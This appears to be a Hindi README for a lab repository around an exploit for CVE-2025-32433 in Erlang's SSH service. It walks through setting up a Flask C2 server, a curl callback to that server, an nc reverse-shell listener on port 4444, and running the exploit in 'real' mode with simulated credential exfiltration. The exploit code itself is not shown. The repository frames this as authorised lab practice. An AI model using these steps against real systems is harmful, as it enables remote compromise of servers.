
CVE-2025-32433 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जिसमें सिम्युलेटेड और वास्तविक हमले के मोड शामिल हैं, जिसमें रिवर्स शेल कॉलबैक और पोस्ट-एक्सप्लॉइटेशन सिमुलेशन के लिए Flask-आधारित C2 सर्वर शामिल है।
इस रिपॉजिटरी में वह कोड है जो एक वास्तविक CVE (CVE-2025-32433) प्रदर्शित करता है।
इसे केवल उन वातावरणों में उपयोग करें जहां आपके पास स्पष्ट प्राधिकरण है।
इस एक्सप्लॉइट का परीक्षण उन प्रणालियों पर कभी न करें जिनके आप स्वामी या प्रबंधक नहीं हैं।
अनधिकृत उपयोग अवैध, अनैतिक और साइबर सुरक्षा समुदाय के लिए हानिकारक है।
CVE-2025-32433 के लिए सिम्युलेटेड और वास्तविक POC
मेरे दोस्त Chocapikk ने मुझे यह मिला हुआ poc erling_cve.py दिखाया, मैं उत्सुक था और इसे एक सुरक्षित वातावरण में परीक्षण करना चाहता था।
आपके पास इस रिपो के साथ दो विकल्प हैं: सुरक्षित सिम्युलेटेड स्क्रिप्ट और सिस्टम जो मैं नीचे बताता हूँ।
या फिर आप असली erling_cve.py का उपयोग कर सकते हैं (नैतिक तरीके से, सावधानी के साथ और केवल उन नेटवर्कों पर जिनके परीक्षण की आपको अनुमति है)।
इस उपकरण का उपयोग करके वास्तविक शोषण का परीक्षण या चलाने से पहले मेरे दोस्त m0usemm0use और CVE-2025-32433 के लिए संवेदनशील लक्ष्य खोजने वाली उनकी पायथन स्क्रिप्ट को देखें!!!!
https://github.com/m0usem0use/erl_mouse
cve-2025-32433 के लिए शोषण का सिम्युलेटेड संस्करण
C2 सर्वर सेट अप करें
Python Flask-आधारित C2 बनाएं: बॉट कॉलबैक या रिवर्स शेल के लिए शक्तिशाली।
C2 सर्वर पर यह सेटअप स्क्रिप्ट चलाएँ
apt update && apt install python3-pip git -y
sudo apt install python3-flask
mkdir ~/c2
cd ~/c2
nano c2_server.py (paste in c2_server script edit as needed)
run
python3 c2_server.py
बॉट्स (या परीक्षण स्क्रिप्ट) इस तरह curl कर सकते हैं
curl -X POST http://:8080/report -d "Bot is online"
Kali पर Python venv सेट अप करें
mkdir ~/ssh-bot-lab && cd ~/ssh-bot-lab
Python वर्चुअल वातावरण बनाएँ
python3 -m venv venv
source venv/bin/activate
sudo apt install python3-requests
कॉलबैक का परीक्षण करें
nano test_callback.py (paste in test_callback script and edit as needed)
कॉलबैक चलाएँ
python3 test_callback.py
अब आपके पास आधिकारिक रूप से है
एक कार्यशील venv एक लाइव क्लाउड C2 कार्यात्मक कॉलबैक इंजेक्शन
-आपको लक्ष्य/पीड़ित मशीन पर एक Erlang प्रक्रिया या सेवा (या सिम्युलेटेड) की आवश्यकता है
Eerling_cve.py क्या करता है?
लक्ष्य IP के पोर्ट 22 से कनेक्ट होता है
नकली SSH संस्करण स्ट्रिंग भेजता है
एक गढ़ा हुआ पैकेट भेजता है (संभवतः कमजोरी को ट्रिगर करने के लिए — Erlang के अप्रलेखित SSH हैंडलर या बफर ओवरफ्लो का दुरुपयोग करने का दिखावा करता है)
हमलावर IP पर वापस एक रिवर्स शेल ट्रिगर करता है
whoami, uname जैसे कमांड चलाकर और /tmp/exfil.log पर नकली 'credential exfil' करके पोस्ट-एक्सप्लॉइटेशन का अनुकरण करता है
हम अपने मिले Erlang-ish PoC को लेंगे और
इसे Kali venv के अंदर कार्यात्मक बनाएँगे
जब 'हमला' चलता है तो इसे हमारे क्लाउड C2 को रिपोर्ट करने के लिए तार करेंगे
इसे नैतिक रूप से और सुरक्षित रूप से नियंत्रित प्रयोगशाला में चलाएँगे
चोरी किए गए डेटा का अनुकरण करने के लिए इसे /tmp/exfil.log उत्पन्न करते देखेंगे
काली मशीन से
nano poc_erlang_test.py
-poc_erlang_test.py में पेस्ट करें और आवश्यकतानुसार संपादित करें
एक लिस्टनर खोलें
एक नए टर्मिनल में चलाएँ
nc -lvnp 4444
poc चलाएँ
python poc_erlang_test.py --real